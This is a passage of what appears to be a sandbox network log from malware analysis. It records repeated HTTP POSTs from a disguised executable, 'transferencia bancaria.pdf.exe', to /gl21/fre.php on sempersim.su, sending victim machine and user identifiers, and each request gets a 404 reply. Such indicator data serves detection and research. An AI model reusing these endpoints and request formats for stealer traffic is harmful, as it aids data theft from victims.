Nov 3, 2022 12:31:02.049869061 CET	133	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:03.547635078 CET	134	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:03 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.6	49728	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:03.903902054 CET	134	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:03.965487003 CET	135	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:05.359035969 CET	135	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:05 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.6	49729	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:05.707381964 CET	136	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:05.770745993 CET	136	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:07.339015961 CET	137	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:06 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.6	49730	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:07.626822948 CET	137	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:07.689786911 CET	138	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:09.196542025 CET	138	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:08 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.6	49731	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:09.511790991 CET	139	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:09.574201107 CET	139	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:10.691873074 CET	139	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:10 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.6	49732	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:20.467945099 CET	140	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:20.530344963 CET	141	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:21.820409060 CET	141	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:21 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.6	49733	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:22.614964008 CET	142	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:22.906861067 CET	142	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:23.219305992 CET	142	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:25.021801949 CET	143	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:24 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.6	49734	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:25.377975941 CET	144	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:25.440109015 CET	144	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:25.735219002 CET	144	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:27.178864956 CET	144	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:26 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.6	49735	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:27.516452074 CET	145	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:27.582582951 CET	146	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:28.883670092 CET	146	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:28 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49709	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:16.075566053 CET	102	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:16.137861967 CET	103	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:17.656419039 CET	103	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:17 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.6	49736	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:29.221112013 CET	147	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:29.283785105 CET	147	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:30.738261938 CET	147	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:30 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.6	49737	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:31.046497107 CET	148	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:31.108310938 CET	148	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:32.671320915 CET	149	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:32 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.6	49738	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:33.019427061 CET	150	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:33.329691887 CET	150	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:33.642221928 CET	151	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:35.287070036 CET	151	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:34 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.6	49739	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:35.606376886 CET	152	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:35.668613911 CET	152	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:37.318947077 CET	152	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:36 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.6	49740	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:37.627027035 CET	153	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:37.939471960 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:38.251959085 CET	154	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:39.620075941 CET	154	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:39 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.6	49741	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:39.946872950 CET	155	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:40.008711100 CET	155	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:40.314831972 CET	156	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:41.587642908 CET	156	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:41 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.6	49742	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:41.893270016 CET	157	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:41.955784082 CET	157	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:43.475625992 CET	157	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:43 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.6	49743	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:43.782644987 CET	158	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:43.846440077 CET	158	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:45.271881104 CET	159	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:44 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
